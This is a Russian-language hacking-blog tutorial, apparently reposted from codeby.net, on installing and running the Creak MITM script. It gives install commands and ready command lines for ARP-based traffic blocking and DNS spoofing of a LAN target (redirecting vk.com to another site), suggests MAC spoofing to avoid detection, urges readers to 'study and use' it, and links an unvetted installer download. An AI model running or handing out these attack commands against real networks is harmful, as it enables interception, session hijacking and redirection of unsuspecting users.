MITM атака с Creak

MITM атака с Creak

WHacker

Всем привет дорогие друзья!

Сегодня мы поговорим о скрипте Creak. Он выполняет некоторые очень известные нападения MITM атакой. И еще, заранее извиняюсь за не четкие скрины.

Некоторые из возможностей:

  • Запрещает возможность навигации и загрузки целевого хоста в локальной сети.
  • DNS спуфинг
  • ARP спуфинг
  • Генерация нового MAC адреса для проведения атаки.
  • Кража TCP сеансов по десинхронизации.

И многое другое. А теперь давайте установим Creak

Имеются зависимости:

  1. Pcap библиотеки
  2. libdnet (dnet модуль)
  3. Может быть необходим scapy.
1. pip install dpkt
2. pip install pypcap


А вот с библиотекой dnet получается немного сложнее.

1. git clone https://github.com/dugsong/libdnet
2. ./configure && make && make install
3. cd python && python setup.py build
(установка описана в файле /libdnet/INSTALL)


Немного помучавшись с зависимостями идем далее. 

Если кто знает как можно проще установить libdnet, напишите в комментарии))


Устанавливаем 

1. git clone https://github.com/codepr/creak.git
2. cd creak
3. python setup.py install
4. chmod +x creak.py


Если ты лентяй, то специально для тебя в конце статьи простенький bash скрипт для установки зависимостей и самого скрипта(о всех ошибках пишите в комментариях под статьей ибо скрипт для установки мой)


Посмотрим весь функционал.​

./ creak.py --help


Опции:
-h, --help показать справочное сообщение и выйти
-1, --series-scan Режим сканирования сеансов
-2, --dns-spoof Подсчет Dns
-3, -session-hijack Попробуйте украсть сеансы TCP по десинхронизации (старая техника)
-x, --spoof Spoof mode, генерирует поддельный MAC-адрес, который будет использоваться во время атаки
-m MACADDR MAC-адрес октетного префикса (может быть полный MAC-адрес адрес в форме AA: BB: CC: DD: EE: FF)
-M ПРОИЗВОДИТЕЛЬ Производитель беспроводного устройства для извлечения префикс на основе производства для паролей MAC
-s SOURCE Исходный IP-адрес (например, адрес класса C, например
192.168.1.150) обычно адрес маршрутизатора
-t TARGET Целевой IP-адрес (например, адрес класса C, например
192.168.1.150), может быть указано несколько раз
-p PORT Целевой порт для выключения
-a HOST Целевой хост, который будет перенаправлен при навигации по
целевая машина
-r REDIR Перенаправление цели, которое будет выбрано вместо хоста
на целевой машине
-v, --verbose Подробный режим вывода
-d, --dotted Точечный режим вывода

Теперь перейдем непосредственно к работе.

Давайте посмотрим какой интерфейс у нас на карте(название). Те кто не помнит, это для вас

iwconfig


1. По умолчанию creak запрещает трафик на определенный хост. Для этого просто задаем имя целевого хоста

./creak.py -t 192.168.1.2 wlan0


Также creak можно не задавать таргет опцией, тогда creak сам спросит его у вас

2. А как же без DNS спуфинга друзья?

./creak.py -t 192.168.1.2 -a vk.com -r codeby.net wlan0


В моем примере vk.com это тот сайт который будет посещать пользователь,codeby.net это сайт на который пользователя перенаправит при посещении сайта vk.com

(Теперь будем рекламировать кодеби подменой днс)

Также для своей безопасности можете добавить опцию " -x" которая проведет spoof mac address т.е. сменит ваш MAC.


А на этом все друзья! Изучайте и пользуйтесь))

Скрипт очень полезен, но имеются некоторые баги которые легко исправимы.

Мой уcтановщик можно скачать тут - http://rgho.st/89nWT2dv6

Источник codeby.net

Report Page